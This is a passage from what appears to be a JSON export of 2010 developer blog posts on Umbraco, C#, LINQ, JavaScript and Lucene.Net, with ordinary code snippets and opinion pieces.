DNS server was returned as invalid. The requests kept looking for a URL along the lines of tcp.members.mac.com and after a bit of searching it turned out that that URL is related to the Apple MobileMe service. So Shan asked if I was signed up with MobileMe, to which I responded “I don’t believe so”, but it turned out again I was wrong, I had signed up to MobileMe, but it must have been when I first got my iPhone. When you get an iPhone you can sign up with a 60 day trail, something I must have done (hey, it said I was signed in, guess I signed up at some point :P). After doing some quick math I concluded that it was ~60 days since I got my iPhone when we first started having internet problems (the last working week last year).\nI instantly signed out of MobileMe, and low and behold the DNS flooding stopped happening!\nThank you Apple for producing a service which is capable of bringing down an office network, you’ve just made sure I strongly consider not purchasing MobileMe in the future!\nOh and I’m never going to live this down at work, Shan isn’t a fan of Apple so this is just adding fuel to the fire!\n", "id": "2010-04-25-oh-woe-is-mobile-me" }, { "title": "Why does this code work?", "url": "https://www.aaron-powell.com/posts/2010-04-25-why-does-this-code-work/", "date": "Sun, 25 Apr 2010 00:00:00 +0000", "tags": [ ".net", "c#", "operator-overload" ], "description": "A neat trick with operators in .NET", "content": "In the discussion on the Umbraco forum about using LINQ to Umbraco I posted a short code snippet of something we write fairly frequently at TheFARM using our version of LINQ with Umbraco.\nI thought I’d post the challenge to my trusty followers, for them to see if they know why the code works. First off the code:\nIEnumerable<XElement> nodes = UmbXmlLinqExtensions.GetNodeByXpath(...); IEnumerable<IUmbracoPage> pages = nodes.Select(n =>(IUmbracoPage)(UmbracoPage)n); What the XPath being evaluated isn’t important, what is important is you’ll notice that we have a collection of System.Xml.Linq.XElement’s, but then it’s directly casting each XElement to IUmbracoPage.\nHere’s the skeleton for the class and interface:\npublic interface IUmbracoPage { ... } public class UmbracoPage : IUmbracoPage { ... } Again the body of the interface isn’t important, what is important is that the class only inherits from the interface, it does not inherit from XElement.\n###Why does this work###\nWell the answer is actually very simple, and it’s a really handy feature of the C# language, explicit operators.\nExplicit operators allow you to define explicit casting between types. So the code that was missing from my original post was this:\npublic static explicit operator UmbracoPage(XElement x) { return new UmbracoPage(x); } What I’ve done here is defined how the compiler is to treat a casting of an XElement to an instance of UmbracoPage, and since UmbracoPage inherits IUmbracoPage there is already a defined casting to it.\nInside the body of my explicit operator I can do anything I desire, here I’m just returning a new instance, passing the XElement to the constructor.\nI find it really quite elegant, and that it reduces code smell quite nicely.\nBut explicit operators also have a buddy, in the form of implicit operators (which was the close-but-no-cigar answer). These work by the type being defined by the assignment target, eg:\nUmbracoPage page = xElement; I’m personally not a fan of implicit operators though, I find them less obvious when you’re reading code.\nSo there you have it, a slightly obscure language feature to play with!\n", "id": "2010-04-25-why-does-this-code-work" }, { "title": "Why I'm not a fan of XSLT", "url": "https://www.aaron-powell.com/posts/2010-04-25-why-im-not-a-fan-of-xslt/", "date": "Sun, 25 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "xslt", "linq-to-umbraco" ], "description": "XSLT has a place in development and Umbraco, here's why I think a lot of people miss understand its place", "content": "When I first joined the Umbraco team with the goal of bringing LINQ to Umbraco to the core framework there was some excitement and quite a bit of the early excitement was from Umbraco MVP Warren Buckley. And with the recent beta release the focus has come back onto LINQ to Umbraco, myself and XSLT.\nWhile preparing to write this post I was tossing up with the name. Although I’ve entitled it “Why I’m not a fan of XSLT” it would have been just as apt to name it “Why write LINQ to Umbraco?”.\nAs you read through this post I was you to keep in mind that I’m not someone who is really that good at XPath and XSLT. In fact, my dislike for XSLT is why I wrote LINQ to Umbraco!\nBut why, being an Umbraco user, don’t i like XSLT? After all, it’s a fairly core part of Umbraco!\n##Compile time checking##\nThat’s right, I’m very much a developer, and very much a compiler-driven developer. Runtime errors really are the worst to try and debug, and that’s what you really get with XPath. XPath is evaluated at runtime (yes, that’s a bit generalized :P), so if you have something wrong in your syntax you wont find it immediately.\nCompare that to .NET code, it’s very hard to write .NET code which wont compile. True that you can still get runtime errors, but they are a lot harder to achieve in the scenario’s we’re looking at for LINQ to Umbraco vs XSLT.\n##Strong typing##\nAgain, another example of me being very much a developer, I would much rather look at an object with properties which knows of the type of the data.\nIf you’re not careful you can mistake the type and then you, again, have a runtime error :P. The .NET compiler wont let you assign a string to an int.\n#Readability##\nThis one will cause a bit of a stir, but I simply don’t find XPath & XSLT readable. Take these two examples:\n//node[nodeTypeAlias='home_page']/node[nodeTypeAlias='contact_us' nodeName='Contact Aaron'] ctx.HomePages.ContactUs.Where(c => c.Name == "Contact Aaron"); My example is very basic, but if you look into a more complex XSLT file (such as many which exists in Warrens CWS package). In fact, in the unit tests for LINQ to Umbraco there is a replication of a few of them (have a look in the source on Codeplex if you want to see them).\nA very important component of code for me is readability. When debugging, especially if the code isn’t yours to begin with, readability is a vital component. You don’t want to have to waste time trying to understand what’s going on in the code before trying to solve it. And if you can’t work out the code properly then there’s a chance you’ll just make the problem worse.\n##API Design##\nAgain I’ll probably cause a stir with this one again but it’s another thing that is very dear to my heart. I am a strong believer in proper API design, and if it’s done wrong then it can make your life hell in the future.\nI also like abstractions. LINQ to Umbraco is an example of that… provider model! Here at The FARM we’ve got a great level of abstraction which we use, we don’t pass classes around, only interfaces, which means that your UI is dumb, really really dumb. There isn’t any business logic contained there, and there’s nothing more complex than a method call.\nBut too often when I see an XSLT it’s containing more than just UI code. And this isn’t really a fault of XSLT, but of how it’s perceived. When you look at an ASPX/ ASCX people have a different mindset, you don’t put anything really in the front-end file other than the markup as there is a CS file associated which you think to put the other complex code into. But with an XSLT there isn’t another file, so everything ends up there.\nThen it becomes too complex to try and achieve with XSLT cough variable incrementing cough so an XSLT extension is written. And I’ve seen some really scary XSLT extensions, which allow you to do things which just make me want to cringe.\nXSLT should only be concerned with formatting data to output markup…\n##XSLT’s produce better markup##\nAnyone who says that is ill-informed. If you don’t think you can write valid, XHTML markup with ASP.NET Web Forms then you’re not doing it right!\nControl Adapters, Repeaters, List View, inline script blocks, etc can all be used to produce what ever markup you so desire. And it doesn’t take much effort to produce good markup with ASP.NET. In fact, with Visual Studio 2008 it’s really hard to use the standard editor to produce crappy markup.\nThe biggest problem is ID’s of elements, but you only have that problem if the element is:\nInside a naming container Set to runat=“server” And you should only be setting runat=“server” on elements you need server-side access to, but that’s a topic for another night.\n##Conclusion##\nSo this brings me to the end of another post. Hopefully it’s been enlightening and I haven’t upset too many people :P\n", "id": "2010-04-25-why-im-not-a-fan-of-xslt" }, { "title": "Working with dates and LINQ to SQL", "url": "https://www.aaron-powell.com/posts/2010-04-25-working-with-dates-and-linq-to-sql/", "date": "Sun, 25 Apr 2010 00:00:00 +0000", "tags": [ "linq-to-sql", "c#", "datetime", "sql" ], "description": "DateTime.MinValue doesn't match the SQL server minimum date. So how do you deal with it using LINQ to SQL?", "content": "Something I’ve heard developers complain about on numerous occasion is that DateTime comparisons between SQL and .NET is a real pain. Often you need to do a comparison of the date against either a Min or Max value.\nWith raw .NET this is really quite easy, you can just use the DateTime struct and grab DateTime.MinValue or DateTime.MaxValue.\nBut if you’ve ever done this:\nvar res = from item in Collection where item.CreatedDate != DateTime.MinValue select item; You’ll get the following exception thrown:\nSqlTypeException: SqlDateTime overflow. Must be between 1/1/1753 12:00:00 AM and 12/31/9999 11:59:59 PM. The problem is that DateTime.MinValue is actually 01/01/0001 12:00:00 AM.\nSo I’ve quite often seen hacks where a new date is being created which represent the minimum value of the SQL server, and all kinds of weird things, but that’s all redundant. The comparision value is built into the .NET framework.\nAll you need to use is System.Data.SqlTypes.SqlDateTime structure. This exposes two fields, MinValue and MaxValue. All you need to do is access the Value property of these and pass it into your LINQ statement. The date will be parsed correctly as a SQL valid date and you can do your comparisons!\nSo please, stop with any silly workaround for date comparisons with SQL and .NET :P\n", "id": "2010-04-25-working-with-dates-and-linq-to-sql" }, { "title": "LINQ in JavaScript", "url": "https://www.aaron-powell.com/posts/2010-04-24-linq-in-javascript/", "date": "Sat, 24 Apr 2010 00:00:00 +0000", "tags": [ "linq", "javascript" ], "description": "LINQ is just a pattern, this shows you how to produce it in JavaScript", "content": "Let me start by saying that I am aware that there is a LINQ to JavaScript project on Codeplex but this was done by me are more of an achidemic exercise/ challange.\nSo while I’ve been working on LINQ to Umbraco I’ve also been spending some time doing AJAX-y stuff, and I have been having a lot of fun playing with JavaScript. And then one day I was thinking about how I would go about manipulating a collection entirely client-side, and realised that loops are ultimately the only way to go about it. Well that’s all well and good, but if you want to do a lot of collection manipulation there’s not a really good way to go about it (or at least, a really good way from a .NET developer point of view :P).\nAnd after all, what is LINQ? LINQ really just is a way in which you can do pesudo-dynamic programming in a static language (as Lambda is heavily derived from dynamic languages). So shouldn’t it be possible to do in a dynamic language?\nSo I whipped out my copy of Visual Studio and got coding away, and here’s an end-line of code entirely in JavaScript:\narray.where(function(item) { return item.property === "something"; }) .orderBy() .groupBy(function(item) { return item.value; }); Lovely isn’t it.\nBut before I get into some of the stuff I do, let me explain why my approach is different to the JSLINQ project on Codeplex. Now I mean no disrespect to Chris, but there are a few things which I don’t like about his approach, and which kind of go against the LINQ pattern.\nFirst off JSLINQ requires that you create a new object which you pass the array into. I can see some reasons for this, better intellisense, more strict control over collection manipulation (the collection becomes read-only) but I think that the primary reason must be to better support object-notation arrays (you know, [] arrays). When you define an array using object notation it’s not really an array (typeof [] === "object"). This is a problem if you want to LINQify it, you need to pass it to some other type.\nThe second issue I have with it is the naming. All the methods are named with Pascal Casing, which is the standard in .NET land, but every JavaScript library I’ve ever used (and as is standard) uses Camel Casing for methods. Sure Pascal keeps its relationship to .NET valid, but when trying to appeal the JavaScript developers it’s just a bit foreign.\nLastly I’m a bit bothered by the lack of argument checking. This may be because I’m a very defensive programmer, but I don’t like to allow developers to shoot themselves in the foot. If a parameter should be a function, then the paramter should be checked as a function. If a parameter is required, it should be checked as such.\nThis is more of a personal preference than a real design flaw though.\n##My Approach##\nNow that I’ve talked aobut what I don’t like with the JSLINQ project I think it’s only fair to talk about my approach. I’ve gone with a more traditional LINQ approach and added extensions to an existing type, in this case the Array type, via Array.prototype. This means it is closer to the extension-method format of IEnumerable from .NET, you just need to add in a namespace (aka, include the JavaScript file), but does have a problem of allowing the collection to be modified (which does have pros and cons).\nI have also kept with standard JavaScript programming and Camel Cased the method names.\nThe following operators are supported:\nWhere Order By (inc decending) First/orDefault Single/orDefault Last/orDefault Select GroupBy IndexOf By and large the word under the hood with for loops, taking a method (aka a Lambda function) and using it. As I said I’m a defensive programmer so there is a lot of type-checking against the arguments and the return types of methods (for example, ensuring the the Where lambda returns a boolean).\nGroupBy is my most proud operator, as it turned out to be a bit harder than I had though. But it does return a collection which is also a pesudo-dictionary which can be itterated through.\nI would provide the full source code but there seems to be a problem with current Umbraco instance running my blog which wont let me upload media items!\nBut here’s the Where and GroupBy operators:\nArray.prototype.where = function(fn) { /// Filters the array /// Filtering function /// if (typeof (fn) !== typeof (Function)) throw Error.argumentType("fn", typeof (fn), typeof (Function), "where takes a function to filter on"); var coll = new Array(); for (var i = 0; i < this.length; i++) { var ret = fn(this[i]); if (typeof (ret) !== "boolean") throw Error.argumentType("fn", typeof (ret), typeof (Boolean), "function provided to where much return bool"); else if (ret) coll.push(this[i]); } return coll; } Array.prototype.groupBy = function(fn) { /// if (!fn || typeof (fn) !== typeof (Function)) { throw Error.argumentType("fn", typeof (fn), typeof (Function), "groupBy takes a function to filter on"); } var ret = new Array(); for (var i = 0; i < this.length; i++) { var key = fn(this[i]); var keyNode = ret.singleOrDefault(function(item) { return item.key === key; }); if (!keyNode) { ret[ret.length] = { "key": key, "items": new Array() }; ret[ret.length - 1].items.push(this[i]); } else { ret[ret.indexOf(keyNode)].items.push(this[i]); } } return ret; } ##The next stage##\nI’ve done a few tweaks within LINQ in JavaScript, and I’ve added a couple of new operators, Skip, SkipWhile and Take, all providing the same functionality that their .NET counterparts provide.\nLets have a look at the way some of the code works, we’ll look at the where method:\nArray.prototype.where = function(fn) { if (typeof (fn) !== typeof (Function)) throw Error.argumentType("fn", typeof (fn), typeof (Function), "where takes a function to filter on"); var coll = new Array(); for (var i = 0; i < this.length; i++) { var ret = fn(this[i]); if (typeof (ret) !== "boolean") throw Error.argumentType("fn", typeof (ret), typeof (Boolean), "function provided to where much return bool"); else if (ret) coll.push(this[i]); } return coll; } First off you’ll notice that I expect a function to be passed into the method, otherwise how would you apply a where?! As you’ll notice I’m doing a lot of type checking as well, the parameter for Where needs to be a function, so I explicitly check it so.\nThen it’s really just a simple itterator that is used, and pushing each item into a new collection where the provided function returns a boolean value of true. Again you’ll notice type checking, this time of the return value of the function. Because JavaScript isn’t compiled, and there is no type checking I have to do it manually (this means that I’m doing a traditional LINQ API, not one where you can return anything you like, ala this post). Not a big problem, but it does add a little overhead.\nSure you can remove it but then it kind-of defeats what I’m trying to achieve, which is a very type-safe API.\nUltimately LINQ in JavaScript is nothing more than throught experiment project. It shows that you can quite easily have a client side query language using JavaScript and functional programming.\nBut I don’t recommend that anyone acutally use it. If you’re using a client-side query API such as this (or any of the other LINQ implementations for JavaScript) you’re doing it wrong. Particularly operators like where, skip, take and even select. These operators are designed to lower/ change the data volume you are working with, which on the client side is not a good idea. It means that you’ve returned too much data from the server! I see the only real useful reason for this (other than just wanting to prove it can be done) is to manipulate a DOM structure, say client-side reordering of a table.\nECMAScript 5 LINQ in JavaScript supports the new Array methods which are part of ECMAScript 5, you can read more about it in the announcement post.\n##Source code\nI’ve pushed the source code for the LINQ in JavaScript project up to bitbucket. If you’re interested in having a play with it you can grab it from there.\nNuGet I have created a NuGet package for this as well. You can get it here.\n", "id": "2010-04-24-linq-in-javascript" }, { "title": "DDD Melbourne & Umbraco", "url": "https://www.aaron-powell.com/posts/2010-04-22-dddmelbourne-umbraco/", "date": "Thu, 22 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "dddmelbourne" ], "description": "DDD Melbourne is on during May and I'll be there to speak about Umbraco", "content": "A few weeks ago I was noticing a lot of tweets from the people I follow about an upcoming event in Melbourne called Developer Developer Developer. Interested I delved into it and found that I really liked what they had to offer. It’s a free conference on the Microsoft stack which is community driven, meaning that anyone can propose a topic and the community would vote for what they wanted to see.\nSo I decided to chuck my hat into the ring and propose a session, and to my horror, I mean surprise, I’ve been accepted!\nWell I’ve booked a flight, still trying to work out where I’m staying and will be around on Friday night in Melbourne if anyone is up for a pre-conference meet and drink.\nDon’t forget the NerdDinner on Saturday night too.\nSecrets of an Umbraco Ninja This is the session I’ll be presenting at DDD Melbourne. I’ll be looking at how you can use Umbraco beyond traditional content management. I’ll be looking at integration with Flash and Silverlight for rich content, how you can get the most out of performance with Examine and dealing with unpublished content.\n####Slide decks and code samples\nWell DDD Melbourne is done and dusted, it was a good time. Really appreciate the work that the guys did to organise it, and very glad to have been given the opportunity to present.\nThanks to all those who attended my session, hopefully something was learnt from it ;).\nAs promised here is the slide deck and code samples:\nSlides (including WebForms MVP stuff I didn’t get to :P) Code (DB not included) ####Footnote\nI’m currently helping out Lewis Benge with DDD Sydney, more information on that will come soon.\n", "id": "2010-04-22-dddmelbourne-umbraco" }, { "title": "An overview of Lucene.Net", "url": "https://www.aaron-powell.com/posts/2010-04-14-lucene-net-overview/", "date": "Wed, 14 Apr 2010 00:00:00 +0000", "tags": [ "lucene.net", "c#", ".net", "examine", "umbraco-examine" ], "description": "Overview and table-of-contents for Lucene.Net articles", "content": "Please note, this document is a work in progress and will be expanded over time\nTable of Contents Overview Analyzer Documents Building an application with Lucene.Net What is Lucene.Net?Although you can read the official word on the Lucene.Net project site I’ll do an abridged version here, explaining it in the way that I understand it.\nLucene.Net is an exact port of the Java Lucene search API, which comprises of indexers, analyzers and searchers. There’s very few differences between the two frameworks, you’re actually able to read the Java API documentation (which is really all you have to go on) and it is going to match up with the functionality. The only real differences are the namespacing in the .NET API is .NET-ish, and some of the API has be re-cased to match a more .NET style.\nLucene takes string data which is then passed into an analyzer and serialized into an index file. Lucene works with strings, and it only understands strings. How it understands strings is defined by the analyzer which you are using.\nOnce you have your data into an index you then get it out via a searcher. A searcher takes a query which uses a construct similar to other search engines (here’s the query syntax documentation). Documents are then returned from Lucene, which references the point in the index file that a result is located, and then can be deserialized into a set of fields which represents the original string data you passed in.\nWhat is Lucene.Net not?In a word, smart. Lucene has no smarts about it, it doesn’t understand file types, it doesn’t really understand dates or numbers. I’m often asked “Can Lucene index x?”, the simple answer is “No”, but really the answer is “Yes”. If you’re able to represent it as a string you can have Lucene handle it. This poses some interesting ideas, say you want to index an Office document, well if that’s an OpenXML document then it’s realatively easy, the OpenXML API is quite good in the regard of extracting text.\nUnderstanding Lucene terminologyTo not get completely lost with Lucene you need to understand the terms which it uses.\nDocument This is a record within the Lucene index. It is comprised of fields. When ever you’re working with data from the index you’re working with a Document Field A single piece of data associated with a document. A field may or may not be indexed, depending on how you’re inserting it into your index, and this defines how you can interact with it, and how Lucene will treat it Term A part of a Lucene query. A Term is comprised of a left and a right part, looking like this: Field:Query. The left part is the name of the field you’re scoring against, the right part is the data to use when scoring Score Lucene generates results determined by how well the score against a search query. Scores are generated by using the search query and comparing the Document’s Fields to it. Analyzer An analyzer defines how the indexer or searcher will handle the data. There are many different analyzers in Lucene and each handle indexing and searching in subtly different ways Indexer The Indexer is what is responsible for searializing a Document and storing within the index file. Searcher The Searcher will take a Query and retrieve a list of Documents out of the a Lucene index. Query A Query is comprised of a group of Terms and Boolean Operations which are passed into a searcher to retrieve Documents out of the Lucene index. The Query is also used to determine the score of a Document within the record set Boolean Operation AND, OR, NOT all comprise Boolean Operations which can affect how a Term is handled within a Query ", "id": "2010-04-14-lucene-net-overview" }, { "title": "ASP.NET WebForms Model-View-Presenter Contrib Project", "url": "https://www.aaron-powell.com/posts/2010-04-12-webforms-mvp-contrib/", "date": "Mon, 12 Apr 2010 00:00:00 +0000", "tags": [ "asp.net", "webforms-mvp", "webforms-mvp-contrib" ], "description": "An overview of WebForms MVP Contrib project", "content": "Overview I’m a big fan of ASP.NET WebForms Model-View-Presenter (MVP) which is produced by Tatham Oddie and Damien Edwards. It’s a really great way to achieve testable webforms development, along with doing good design with decoupled webforms design.\nAs an Umbraco developer you’re somewhat limited with your options for testable development. You can use ASP.NET MVC, but it doesn’t integrate quite the same way, it’s not really possible drop them in as macros.\nYou could look at an isolation framework like Typemock to completely mock out the HttpContext and everything else, but then you’re potentially creating too many fake expectations around how everything is going to work.\nThis is where WebForms MVP can come in, it’s designed to fill this gap. I’ve used it on several Umbraco builds, and in fact I ran a webinar (screen cast here) and hopefully I’ll be talking about it in a formal capacity at CodeGarden10 this year.\nI’ve been using MVP for WebForms for a number of years now, starting with home-grown frameworks so I was a bit familiar with what I liked with a framework. But because WebForms MVP is a framework it’s not really meant to provide many out of the box components.\nWhile driving to Canberra for Christmas 2009 I was thinking about how I was currently implementing WebForms MVP and realising that I was constantly writing the same set of views and presenters and though that others who are using this are probably doing the same thing. There’s a number of things that seem very logical to need, such as validation, submit/ cancel eventing, etc. So I decided that it would be a great idea if theres common components were available.\nSo once I’d arrived at my destination I grabbed out my iPhone and started writing the initial concepts for what is now WebForms MVP Contrib.\nWhy As I stated the goal of this project was to give a bunch of defaults for people who are working with WebForms MVP. I also liked the extensibility of the project, the ability to change out the PresenterBinder, which is essentially the IoC container which is used internally of WebForms MVP. Now there’s nothing wrong with the built in PresenterBinder, but I like options, so I set about producing a Ninject Binder, meaning that it’s possible to use Ninject for all your IoC needs within WebForms MVP.\nThe other major goal was to make for more service-orientated presenters than the examples which are available as part of the source package. Service-orientated design is something we practice quite extensively at TheFARM and makes it very easy to abstract away data interactions from any business layer of your application. This in turn makes testing even easier.\nWhat’s available Although “full” documentation is available up on our project codeplex page (and I really should put it on the official site…) currently theres 2 available PresenterBinders, we support Ninject and StructureMap (thanks to Lewis Benge).\nAdditionally there’s a handful of standard views, and view extensions, which are essentially interfaces which have some grouped functionality which is useful to implement in some instances.\nCurrently we’re sitting at CTP6 as the primary release, which uses the CTP6 release of WebForms MVP. With the recent check-in’s to support StructureMap we’ll be looking to do a CTP7 release to bring us in line with the current stable of WebForms MVP, but I’m more handing out for the exposure of the discovery strategy to see what funky stuff we can do with that.\nHelping out As you can probably tell from the check-in’s there hasn’t been a lot from me recently on this project. It’s by no means dead, but as I commit on several other projects as well my time can be spread pretty thin. If you have any ideas or any features you’d like to see please get in contact with me. You can find my contact information on the About page of this site, or additionally you can drop us a message on the codeplex site.\n", "id": "2010-04-12-webforms-mvp-contrib" }, { "title": "Umbraco DataType Design", "url": "https://www.aaron-powell.com/posts/2010-04-11-umbraco-data-type-design/", "date": "Sun, 11 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "data-type" ], "description": "Looking into how the DataTypes are designed for Umbraco", "content": "DataType’s in Umbraco 4.x I’ve often seem people wondering why performances is so terrible when creating Documents, particularly lots of Documents from the Umbraco API. There is a good reason for this, the design of the DataType allows anyone to be able to implement them to do almost anything.\nThe standard way to use a DataType is to write to the Umbraco database, but you don’t have to do it that way, you can write to an XML file, call a web service or actually have no data saving.\nBecause of this it’s up the responsibility of the DataType creator to do the CRUD operations, it’s not possible to have Umbraco have some kind of a global save operation (because what if there wasn’t a save!).\nThis does mean that there’s the probability for lots of database interaction when you perform CRUD operations, but it does mean that DataTypes are infinitely flexible.\nBecause of this we were able to produce TheFARM Media Link Checker package for Umbraco. And I’d also hasten a guess that this flexibility also allowed the Google Analytics for Umbraco package to now allow lookups from the content item.\n", "id": "2010-04-11-umbraco-data-type-design" }, { "title": "Umbraco Event Improvements", "url": "https://www.aaron-powell.com/posts/2010-04-11-umbraco-event-improvments/", "date": "Sun, 11 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "eventing" ], "description": "A look at the events changes in Umbraco versions", "content": "As I mentioned in a previous article there’s a problem with the 4.0 eventing. But not everything is bad news, there’s a light at the end of the tunnel!\nBackground If you’re wanting to learn more about why this is the way then I suggest you have a look at this article about data types.\nThe crux of it really comes down to the design of Data Types and how they are designed.\nUmbraco 4.1 changes When I first noticed the problems I outlined in the great Umbraco API misconception I decided the look into what I could do about it, but still maintain backwards compatibility with Umbraco 4.0.\nAt the very least I changed Umbraco 4.1 to raise the BeforeSave event before any saving occurs! It only works when you’re using the Document.BeforeSave event, not the other objects which inherit from Content (where the event originates from). Also, this change only happens when you’re using the CMS front-end.\nIf you’re using the Document API yourself to create documents I’ve changed the constructor Document(int id, bool optimizedMode) to use deferred saving. This means the save method does actually do the saving!\nI didn’t not change anything to reduce the number of SQL calls, it just performs the saving after the BeforeSave event fires from within the Save method.\nIn addition to deferred saving I’ve also added an indexer to the Document object so you can do:\nvar doc = new Document(1234, true); var something = (string)doc["MyProperty"]; Personally I think this is much more obvious than the getProperty operation, and it’s how I’d expect to interact with them in the future.\nInternally the indexer wraps the getProperty method so you can use it in any instance. But when you’re using it is used with optimized mode it will also cache the properties! Every time you call getProperty you go into the database (or so I could gather). When you use the indexer and optimized mode the property accessor looks into an internal cache, sees if it’s there and if it isn’t gets it from the database, adds it to the cache and saves it for later. This is how the deferred saving works, it looks into the cache to set the property values.\nHopefully this makes the eventing in 4.1 a lot more useful if you need to control the flow better.\n", "id": "2010-04-11-umbraco-event-improvments" }, { "title": "Umbraco AUSPAC January 2010", "url": "https://www.aaron-powell.com/posts/2010-04-09-umbraco-auspac-january-2010/", "date": "Fri, 09 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "user-group" ], "description": "", "content": "First off I’d like to say thanks to all who attended tonights Umbraco webinar, I think we had mid 20’s for most of the session, really excited by the volume.\nAnyone who hasn’t already filled out the post-session review please do so, it’ll help me make it more awesome next time ;).\nAs promised, here are the resources from tonights session:\nSlide Deck .NET project For those who are interested I did record tonights session, but it appears that it stopped recording about 20 minutes before the end. The majority of the video can be found here for your viewing pleasure.\n", "id": "2010-04-09-umbraco-auspac-january-2010" }, { "title": "Are Extension Methods Really Evil?", "url": "https://www.aaron-powell.com/posts/2010-04-08-are-extension-methods-really-evil/", "date": "Thu, 08 Apr 2010 00:00:00 +0000", "tags": [ "c#", ".net", "extension-methods" ], "description": "", "content": "Ruben (of Umbraco fame) recently wrote a post entitled Extension Methods: Silent static slaves which was in response to a comment I’d left on a previous post about static classes and static method being evil.\nIf you haven’t read Ruben post then I suggest you do before continue on with mine as a lot of what I’ll be saying is in counter argument to him (including the comments).\nDone? Good, continue on!\nRuben has produced a demo which is great for illistrating his point, but is it an example of good design turning bad or just bad design from the start?\nThe first thing I want to look at is that his extension methods are on the interface and implementation class. This is bad design to start with, but it’s not just bad design if you’re using extension methods, this could manifest itself as bad design if you did it as helper methods in a separate class, eg:\nclass Helpers { public static int CalculateShoeCount(Animal animal) { //do processing } public static int CalculateShoeCount(Monkey animal) { //do processing } } So this would fall into the same trap if we don’t re-cast Animal to Monkey before calling the helper.\nBut does this prove Ruben’s initial point, that static’s are just plain evil? Well no, design isn’t possible without statics. If you try and design without statics you end up with nothing but instance memebers. If that’s the case where do I find the current method int.TryParse, does this become 0.TryParse?\nRuben’s demo is an example of bad design producing worse design. In good design the CalculateShoeCount would be a member of the Animal interface, particularly since the implementation changes per interface implementation type.\nSo how can we use extension methods to produce good design? Well first you really need to understand what an extension method is. As Ruben quite correctly pointed out an extension is just syntactic suger and extension methods should be treated as such. Developers need to understand that extension methods are only designed to provide functionality to a classes public instance members; they are stateless. (This is why I don’t understand why so many people of Stack Overflow want extension properties added to the compiler, this is where people are missing the point of the extension concept) And if you’re expecting a stateful nature from the extension methods then you’ve missed their goal.\nLets look at some good examples of using extension methods. Here’s a fav of mine for Umbraco:\npublic static string Url(this Node node) { return umbraco.library.NiceUrl(node.Id); } (Hey look, a static calling a static ;)).\nOr how about this one:\npublic static IEnumerable<ListItem> SelectedItems(this ListControl ctrl) { return ctrl.Items.Cast<ListItem>().Where(item => item.Selected); } Now we’re using an extension method with an extension method.\nBut both of these examples are using actual class implementations, not interfaces, does that make a difference? Yes, and a big one. When you are putting extensions on an interface there needs to be no possibility of confusion about what the extensions are for. And if you are also providing an extension of an implementation of the class they need to be in separate namespaces. If they aren’t, you will end up with what Ruben shows, misrepresentation of the methods abilities.\nIQueryable is a perfect example of how to use extension methods on top of an interface. If you have a look at the construct of the interface there’s actually no constructs within it! This means that “all” the functionality is provided by extension methods, allowing anyone to write their own extensions. If I was to not include the namespace System.Linq I can then write my own query extensions, eg a Where that does return a bool, or negate operators which I don’t want to support.\nSo in my opinion extension methdos are no more evil than anything else in programming; they can easily be abused and misused, but find something that it’d not possible to misuse to prove bad design.\n", "id": "2010-04-08-are-extension-methods-really-evil" }, { "title": "LINQ to XML to... Excel?", "url": "https://www.aaron-powell.com/posts/2010-04-08-linq-to-xml-to-excel/", "date": "Thu, 08 Apr 2010 00:00:00 +0000", "tags": [ "linq", "linq-to-xml", "excel", "c#" ], "description": "Easily generating Excel documents using LINQ to XML", "content": "The other day one of the guys I work with was trying to work out the best way to generate an Excel document from .NET as the client had some wierd requirements around how the numerical data needed to be formatted (4 decimal places, but Excel treats a CSV to only show 2).\nThe next day my boss came across a link to a demo of how to use LINQ to XML to generate a XML file using the Excel schema sets which allow for direct opening in Excel. One problem with the demo, it was using VB 9, and anyone who’s seen VB 9 will know it has a really awesome way of handling XML literals in the IDE. This isn’t a problem if you’re coding in VB 9, but if you’re in C# it can be.\nThe VB 9 video can be found here: http://msdn.microsoft.com/en-us/vbasic/bb927708.aspx\nI recommend it be watched before progressing as it’ll make a lot more sense against the following post. It’ll also cover how to create the XML file, which I’m going to presume is already done.\nIn the beginning Because C# doesn’t have a nice way to handle XML literals like VB 9 does we’re going to have to do a lot of manual coding of XML, additionally we need to ensure that the appropriate namespaces are used on the appropriate nodes.\nThe Excel XML using 4 distinct namespaces, in 5 declarations (yes, I’ll get to that shortly) so we’ll start off by defining them like so:\nXNamespace mainNamespace = XNamespace.Get("urn:schemas-microsoft-com:office:spreadsheet"); XNamespace o = XNamespace.Get("urn:schemas-microsoft-com:office:office"); XNamespace x = XNamespace.Get("urn:schemas-microsoft-com:office:excel"); XNamespace ss = XNamespace.Get("urn:schemas-microsoft-com:office:spreadsheet"); XNamespace html = XNamespace.Get("http://www.w3.org/TR/REC-html40"); Notice how the ‘main namespace’ and ‘ss’ are exactly the same, well this is how they are handled within the XML document. The primary namespace for the file is urn:schemas-microsoft-com🏢spreadsheet but in some locations it’s also used as a prefix.\nFor this demo I’m going to be using the obligatory Northwind database and I’m going to just have a simple query against the customers table like so:\nvar dataToShow = from c in ctx.Customers select new { CustomerName = c.ContactName, OrderCount = c.Orders.Count(), Address = c.Address }; Now we have to start building our XML, the root element is named Workbook and then we have the following child groups:\nDocumentProperties ExcelWorkbook Styles Worksheet WorksheetOptions Each with variying child properties.\nFirst thing we need to do is set up our XElement and apply the namespaces, like so:\nXElement workbook = new XElement(mainNamespace + "Workbook", new XAttribute(XNamespace.Xmlns + "html", html), CreateNamespaceAtt(XName.Get("ss", "http://www.w3.org/2000/xmlns/"), ss), CreateNamespaceAtt(XName.Get("o", "http://www.w3.org/2000/xmlns/"),o), CreateNamespaceAtt(XName.Get("x", "http://www.w3.org/2000/xmlns/"), x), CreateNamespaceAtt(mainNamespace), I’m using a helper method to create the namespace attribute (which you’ll be able to find in the attached source), but notice how the “main” namespace is the last one we attach, if we don’t do it this way we’ll end up with the XElement detecting the same namespace and only adding it once. Also, you need to ensure that you’re prefixing the right namespace to the XElement tag!\nDocumentProperties and ExcelWorkbook These two node groups are not overly complex, they hold the various meta-data about the Excel document we are creating, I’ll skip them as they aren’t really interesting and can easily be found in the source.\nStyles This section is really important and handy for configuring custom looks within the document. There are way to many options to configure here to cover in the demo, it’s easiest to generate the styles in Excel and save the file as an XML document (or read the XSD if you really want!). If you’re doing custom styles make sure you note the ID you give the style so you can use it later in your document.\nAlso, these styles are workbook wide, not worksheet so you can reuse them on each worksheet you create. I have a very simple bold header.\nGenerating a Worksheet Here is where the fun starts, we need to generate our 